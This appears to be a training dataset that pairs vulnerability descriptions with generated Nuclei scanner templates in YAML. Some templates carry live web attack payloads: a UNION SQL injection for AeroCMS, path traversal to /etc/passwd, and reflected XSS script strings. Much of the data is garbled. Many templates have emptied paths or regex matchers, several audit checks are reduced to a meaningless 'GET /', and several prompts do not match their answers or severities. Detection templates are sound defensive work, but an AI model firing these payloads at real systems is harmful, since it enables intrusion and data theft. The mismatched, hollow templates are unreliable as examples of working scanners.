Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: saracartershow
info:
name: SaraCarterShow User Name Information - Detect
author: dwisiswant0
severity: info
description: SaraCarterShow user name information check was conducted.
tags: osint,osint-political,saracartershow,discovery
http:
- method: GET
path:
- "https://saraacarter.com/author/{{user}}/"
matchers:
- type: status
status:
- 200
- type: word
words:
- "| Sara A. Carter"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: Bella Malware - Detect
|
Title: Bella Malware - Detect
Summary: Bella Malware - Detect. Tags: malware, file, macos-bella
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: macos-bella-malware
info:
name: Bella Malware - Detect
author: daffainfo
severity: info
description: Bella Malware - Detect
tags: malware,file,macos-bella
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
macos-bella-malware
|
Generate a Nuclei template for CVE-2022-38812
|
Title: SQL Injection in aerocms_project aerocms
Summary: AeroCMS 0.1.1 is vulnerable to SQL Injection via the author parameter.
Vulnerability Type: SQL Injection
Severity: medium
Affected Products: aerocms_project aerocms
Indicators: error, vulnerability detected
|
id: CVE-2022-38812
info:
name: AeroCMS 0.1.1 - SQL Injection
author: shivampand3y
severity: medium
description: AeroCMS 0.1.1 contains a SQL injection caused by unsanitized author parameter, letting attackers execute arbitrary SQL commands, exploit requires crafted author input.
tags: cve,cve2022,aero,cms,sqli,edb,vuln
http:
- method: GET
path:
- "{{BaseURL}}/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1"
- "{{BaseURL}}/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1"
matchers:
- type: word
words:
- "{{md5(num)}}"
part: body
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2022-38812
|
Generate a Nuclei template for: netlify takeover detection
|
Title: netlify takeover detection
Summary: netlify takeover detection. netlify takeover was detected.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: netlify-takeover
info:
name: netlify takeover detection
author: 0xPrial,pdteam
severity: high
description: netlify takeover was detected.
tags: takeover,netlify,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
- type: word
words:
- "Not Found - Request ID:"
part: body
- type: word
words:
- "Netlify"
part: header
|
generic
|
high
|
netlify-takeover
|
Generate a Nuclei template for: SAP Internet Graphics Server (IGS) Detection
|
Title: SAP Internet Graphics Server (IGS) Detection
Summary: SAP Internet Graphics Server (IGS) Detection. Detection of SAP Internet Graphics Server (IGS)
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: sap-igs-detect
info:
name: SAP Internet Graphics Server (IGS) Detection
author: _generic_human_
severity: info
description: Detection of SAP Internet Graphics Server (IGS)
tags: sap,tech,igs,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "SAP IGS"
- "is running"
part: body
condition: and
- type: status
status:
- 200
- type: word
words:
- "SAP Internet Graphics Server"
part: header
|
generic
|
info
|
sap-igs-detect
|
Generate a Nuclei template for CVE-2010-1312
|
Title: Path Traversal in ijoomla com_news_portal
Summary: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Vulnerability Type: Path Traversal
Severity: medium
Affected Products: ijoomla com_news_portal
Indicators: error, vulnerability detected
|
id: CVE-2010-1312
info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers:
- type: regex
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2010-1312
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: graphite-browser
info:
name: Graphite Browser Login Panel - Detect
author: 0x_Akoko
severity: info
description: Graphite Browser login panel was detected.
tags: graphite,panel,discovery
http:
- method: GET
path:
- "{{BaseURL}}/"
matchers:
- type: word
words:
- "<title>Graphite Browser</title>"
part: body
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2021-21345
|
Title: Code Injection in netapp oncommand_insight and others
Summary: XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.
Vulnerability Type: Code Injection
Severity: medium
Affected Products: netapp oncommand_insight, apache activemq, apache jmeter
Indicators: error, vulnerability detected
|
id: CVE-2021-21345
info:
name: XStream < 1.4.16 - Remote Code Execution
author: pwnhxl,vicrack
severity: critical
description: XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "http"
part: interactsh_protocol
- type: word
words:
- "User-Agent: curl"
part: interactsh_request
|
cve
|
medium
|
CVE-2021-21345
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: kafka-connect-ui
info:
name: Apache Kafka Connect UI Login Panel - Detect
author: pdteam
severity: info
description: Apache Kafka Connect UI login panel was detected.
tags: panel,kafka,apache,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<title>Kafka Connect UI</title>"
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: ElastiCache Event Notifications - Disabled
|
Title: ElastiCache Event Notifications - Disabled
Summary: ElastiCache Event Notifications - Disabled. Ensure that your Amazon ElastiCache clusters are configured to send event notifications via Amazon Simple Notification Service (SNS) in order to monitor your cache clusters for important events and quickly mitigate any issues with your cache system.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: cache-event-notification-disabled
info:
name: ElastiCache Event Notifications - Disabled
author: DhiyaneshDK
severity: medium
description: Ensure that your Amazon ElastiCache clusters are configured to send event notifications via Amazon Simple Notification Service (SNS) in order to monitor your cache clusters for important events and quickly mitigate any issues with your cache system.
tags: cloud,devops,aws,amazon,elasticache,aws-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
cache-event-notification-disabled
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: neobox-panel
info:
name: Neobox Web Server Login Panel - Detect
author: pikpikcu
severity: info
description: Neobox Web Server login panel was detected.
tags: panel,neobox,webserver,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "ng-app="NeoboxUI" ng-controller="GlobalCtrl">"
part: body
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2024-54767
|
Title: Vulnerability (CWE-203) in CVE-2024-54767
Summary: An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication. NOTE: this is disputed by the Supplier because it cannot be reproduced, and the issue report focuses on an unintended configuration with direct Internet exposure.
Vulnerability Type: Vulnerability (CWE-203)
Severity: high
Indicators: error, vulnerability detected
|
id: CVE-2024-54767
info:
name: AVM FRITZ!Box 7530 AX - Unauthorized Access
author: DhiyaneshDK
severity: high
description: An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication.
tags: cve,cve2024,fritz!box,info-leak,unauth,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "<e:BoxInfo"
part: body
- type: word
words:
- "text/xml"
part: content_type
- type: status
status:
- 200
|
cve
|
high
|
CVE-2024-54767
|
Generate a Nuclei template for CVE-2020-11034
|
Title: Vulnerability (CWE-185) in glpi-project glpi
Summary: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
Vulnerability Type: Vulnerability (CWE-185)
Severity: medium
Affected Products: glpi-project glpi
Indicators: error, vulnerability detected
|
id: CVE-2020-11034
info:
name: GLPI <9.4.6 - Open Redirect
author: pikpikcu
severity: medium
description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
tags: cve,cve2020,redirect,glpi,glpi-project,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?redirect=/\/interact.sh/"
- "{{BaseURL}}/index.php?redirect=//interact.sh"
matchers:
- type: regex
part: header
|
cve
|
medium
|
CVE-2020-11034
|
Generate a Nuclei template for: telegram phishing Detection
|
Title: telegram phishing Detection
Summary: telegram phishing Detection. A telegram phishing website was detected
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: telegram-phish
info:
name: telegram phishing Detection
author: rxerium
severity: info
description: A telegram phishing website was detected
tags: phishing,telegram,osint,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed."
- type: status
status:
- 200
- type: dsl
|
generic
|
info
|
telegram-phish
|
Generate a Nuclei template for: ROOT - Path Disclosure
|
Title: ROOT - Path Disclosure
Summary: ROOT - Path Disclosure. Detects potential exposure of sensitive file paths like /000~ROOT~000/.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: root-path-disclosure
info:
name: ROOT - Path Disclosure
author: soltanali0,ArganexEmad
severity: high
description: Detects potential exposure of sensitive file paths like /000~ROOT~000/.
tags: misconfig,exposure,info-leak,listing,lfr,vuln
http:
- method: GET
path:
- "{{BaseURL}}/home/000~ROOT~000/etc/passwd"
- "{{BaseURL}}/000~ROOT~000/etc/passwd"
- "{{BaseURL}}/OLDS/home/000~ROOT~000/etc/passwd"
- "{{BaseURL}}/app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd"
matchers:
- type: regex
part: body
- type: regex
part: accept_ranges
- type: status
status:
- 200
|
generic
|
high
|
root-path-disclosure
|
Generate a Nuclei template for CVE-2024-54763
|
Title: Unknown Vulnerability in CVE-2024-54763
Summary: An access control issue in the component /login/hostinfo.cgi of ipTIME A2004 v12.17.0 allows attackers to obtain sensitive information without authentication.
Vulnerability Type: Unknown Vulnerability
Severity: medium
Indicators: error, vulnerability detected
|
id: CVE-2024-54763
info:
name: ipTIME A2004 - Unauthorized Access
author: ritikchaddha
severity: medium
description: An access control issue in the component /login/hostinfo.cgi of ipTIME A2004 v12.17.0 allows attackers to obtain sensitive information without authentication.
tags: cve,cve2024,iptime,router,unauth,exposure,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/login/hostinfo.cgi"
matchers:
- type: regex
- type: word
words:
- "text/plain"
part: content_type
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2024-54763
|
Generate a Nuclei template for CVE-2024-7928
|
Title: Path Traversal in fastadmin fastadmin
Summary: A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
Vulnerability Type: Path Traversal
Severity: medium
Affected Products: fastadmin fastadmin
Indicators: error, vulnerability detected
|
id: CVE-2024-7928
info:
name: FastAdmin < V1.3.4.20220530 - Path Traversal
author: s4e-io,Hel10-Web
severity: medium
description: A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
tags: cve,cve2024,fastadmin,lfi,vkev,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "jsonpReturn("
- ""password":"
- ""username":"
- ""database":"
part: body
condition: and
- type: word
words:
- "application/javascript"
part: content_type
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2024-7928
|
Generate a Nuclei template for CVE-2023-32563
|
Title: Path Traversal in ivanti avalanche
Summary: An unauthenticated attacker could achieve the code execution through a RemoteControl server.
Vulnerability Type: Path Traversal
Severity: critical
Affected Products: ivanti avalanche
Indicators: error, vulnerability detected
|
id: CVE-2023-32563
info:
name: Ivanti Avalanche - Remote Code Execution
author: princechaddha
severity: critical
description: An unauthenticated attacker could achieve the code execution through a RemoteControl server.
tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive,vkev,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "CVE-2023-32563"
part: body_2
|
cve
|
critical
|
CVE-2023-32563
|
Generate a Nuclei template for: Charity Search API Test
|
Title: Charity Search API Test
Summary: Charity Search API Test. Non-profit charity data. Tags: token-spray, charity, search
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: api-charity
info:
name: Charity Search API Test
author: daffainfo
severity: info
description: Non-profit charity data
tags: token-spray,charity,search
http:
- method: GET
path:
- "http://data.orghunter.com/v1/charitybasic?user_key={{token}}&ein=590774235"
matchers:
- type: status
status:
- 200
- type: word
words:
- ""ein":"
- ""name":"
- ""inCareOfName""
part: body
condition: and
|
generic
|
info
|
api-charity
|
Generate a Nuclei template for CVE-2023-27641
|
Title: Cross-Site Scripting (XSS) in lsoft listserv
Summary: The REPORT (after z but before a) parameter in wa.exe in L-Soft LISTSERV 16.5 before 17 allows an attacker to conduct XSS attacks via a crafted URL.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: lsoft listserv
Indicators: error, vulnerability detected
|
id: CVE-2023-27641
info:
name: L-Soft LISTSERV 16.5 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: The REPORT (after z but before a) parameter in wa.exe in L-Soft LISTSERV 16.5 before 17 allows an attacker to conduct XSS attacks via a crafted URL.
tags: cve2023,cve,xss,listserv,edb,lsoft,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wa.exe?REPORT&z=4&"><script>alert(document.domain)</script>a=1"
matchers:
- type: word
words:
- "><script>alert(document.domain)</script>"
- "LISTSERV"
part: body
condition: and
- type: word
words:
- "text/html"
part: content_type
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2023-27641
|
Generate a Nuclei template for: Confluence OAuth Administration Endpoint
|
Title: Confluence OAuth Administration Endpoint
Summary: Confluence OAuth Administration Endpoint. Tags: misconfig, jira, confluence
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: confluence-oauth-admin
info:
name: Confluence OAuth Administration Endpoint
author: DhiyaneshDK
severity: info
description: Confluence OAuth Administration Endpoint
tags: misconfig,jira,confluence,atlassian,vuln
http:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/oauth/view-consumer-info"
- "{{BaseURL}}/confluence/plugins/servlet/oauth/view-consumer-info"
matchers:
- type: word
words:
- "<title>OAuth Consumer Information"
- "OAuth Administration"
- type: status
status:
- 200
|
generic
|
info
|
confluence-oauth-admin
|
Generate a Nuclei template for: Resource Location Restrictions Not Configured
|
Title: Resource Location Restrictions Not Configured
Summary: Resource Location Restrictions Not Configured. Ensure that the locations where location-based cloud resources can be created within your GCP organization are defined using the "Google Cloud Platform - Resource Location Restriction" organization policy. This constraint policy helps you achieve regulatory compliance by explicitly defining the locations allowed to deploy Google Cloud resources for your organization. You can specify multi-regions such as "asia" and "europe" and individual regions su
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: gcloud-org-resource-locations
info:
name: Resource Location Restrictions Not Configured
author: princechaddha
severity: medium
description: Ensure that the locations where location-based cloud resources can be created within your GCP organization are defined using the "Google Cloud Platform - Resource Location Restriction" organization policy. This constraint policy helps you achieve regulatory compliance by explicitly defining the locations allowed to deploy Google Cloud resources for your organization. You can specify multi-regions such as "asia" and "europe" and individual regions such as "us-east1" or "europe-west2" as allowed locations.
tags: cloud,devops,gcp,gcloud,resourcemanager,security,compliance,location,gcp-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
gcloud-org-resource-locations
|
Generate a Nuclei template for: Milvus - Detect
|
Title: Milvus - Detect
Summary: Milvus - Detect. Milvus was detected.. Tags: tech, vector-database, milvus
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: milvus-detect
info:
name: Milvus - Detect
author: s4e-io
severity: info
description: Milvus was detected.
tags: tech,vector-database,milvus,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<title>Milvus"
- "<title>Milvus Demo"
- "<title>Milvus Insight"
- "<title>Milvus Enterprise Manager"
part: body
condition: or
|
generic
|
info
|
milvus-detect
|
Generate a Nuclei template for: Exposed VPC Endpoint
|
Title: Exposed VPC Endpoint
Summary: Exposed VPC Endpoint. Identify and secure fully accessible Amazon VPC endpoints to prevent unauthorized access to AWS services.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: vpc-endpoint-exposed
info:
name: Exposed VPC Endpoint
author: princechaddha
severity: medium
description: Identify and secure fully accessible Amazon VPC endpoints to prevent unauthorized access to AWS services.
tags: cloud,devops,aws,amazon,vpc,aws-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
vpc-endpoint-exposed
|
Generate a Nuclei template for: SMB Anonymous Access Detection
|
Title: SMB Anonymous Access Detection
Summary: SMB Anonymous Access Detection. Detects anonymous access to SMB shares on a remote server.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: smb-anonymous-access
info:
name: SMB Anonymous Access Detection
author: pussycat0x
severity: high
description: Detects anonymous access to SMB shares on a remote server.
tags: js,network,smb,enum,misconfig,vuln
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
smb-anonymous-access
|
Generate a Nuclei template for: SSRPM - Arbitary Password Reset on Default Client Interface Installation
|
Title: SSRPM - Arbitary Password Reset on Default Client Interface Installation
Summary: SSRPM - Arbitary Password Reset on Default Client Interface Installation. The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: ssrpm-arbitrary-password-reset
info:
name: SSRPM - Arbitary Password Reset on Default Client Interface Installation
author: vince-isec
severity: high
description: The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
tags: ssrpm,intrusive,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- ""ErrorCode":-55"
- ""Success":false"
part: body
condition: and
- type: word
words:
- "application/json"
part: content_type
- type: status
status:
- 200
|
generic
|
high
|
ssrpm-arbitrary-password-reset
|
Generate a Nuclei template for CVE-2016-1000133
|
Title: Cross-Site Scripting (XSS) in designsandcode forget_about_shortcode_buttons
Summary: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: designsandcode forget_about_shortcode_buttons
Indicators: error, vulnerability detected
|
id: CVE-2016-1000133
info:
name: WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "Forget About Shortcode Buttons ="
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2016-1000133
|
Generate a Nuclei template for: Linux Account Lockout Threshold Check
|
Title: Linux Account Lockout Threshold Check
Summary: Linux Account Lockout Threshold Check. The system did not enforce an account lockout threshold, leaving it exposed to brute-force attacks through unrestricted login attempts.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: linux-account-lockout-threshold
info:
name: Linux Account Lockout Threshold Check
author: songyaeji
severity: high
description: The system did not enforce an account lockout threshold, leaving it exposed to brute-force attacks through unrestricted login attempts.
tags: local,linux,kisa,audit,compliance
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
linux-account-lockout-threshold
|
Generate a Nuclei template for: Remote Desktop Users Can Redirect Drives
|
Title: Remote Desktop Users Can Redirect Drives
Summary: Remote Desktop Users Can Redirect Drives. Checks if Remote Desktop users are allowed to redirect local drives, which can pose a security risk.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: rdp-drive-redirection-allowed
info:
name: Remote Desktop Users Can Redirect Drives
author: princechaddha
severity: medium
description: Checks if Remote Desktop users are allowed to redirect local drives, which can pose a security risk.
tags: rdp,drive-redirection,code,windows-audit
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
rdp-drive-redirection-allowed
|
Generate a Nuclei template for: S3 Bucket with Public WRITE_ACP Access
|
Title: S3 Bucket with Public WRITE_ACP Access
Summary: S3 Bucket with Public WRITE_ACP Access. Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions.
Vulnerability Type: Security Check
Severity: critical
Indicators: vulnerability detected
|
id: s3-public-write-acp
info:
name: S3 Bucket with Public WRITE_ACP Access
author: princechaddha
severity: critical
description: Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions.
tags: cloud,devops,aws,amazon,s3,aws-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
critical
|
s3-public-write-acp
|
Generate a Nuclei template for: Yii Error Page - Detct
|
Title: Yii Error Page - Detct
Summary: Yii Error Page - Detct. Yii (An application framework to handle and manage errors) error page detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: yii-error-page
info:
name: Yii Error Page - Detct
author: DhiyaneshDk
severity: info
description: Yii (An application framework to handle and manage errors) error page detected.
tags: exposure,yii,logs,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<title>yii\base\ErrorException</title>"
part: body
- type: status
status:
- 500
|
generic
|
info
|
yii-error-page
|
Generate a Nuclei template for: Detect Overview Kubernetes Resource Report
|
Title: Detect Overview Kubernetes Resource Report
Summary: Detect Overview Kubernetes Resource Report. Information Disclosure of Kubernetes Resource Report
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: kubernetes-resource-report
info:
name: Detect Overview Kubernetes Resource Report
author: pussycat0x
severity: medium
description: Information Disclosure of Kubernetes Resource Report
tags: kubernetes,exposure,misconfig,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "Overview - Kubernetes Resource Report"
part: body
- type: status
status:
- 200
|
generic
|
medium
|
kubernetes-resource-report
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.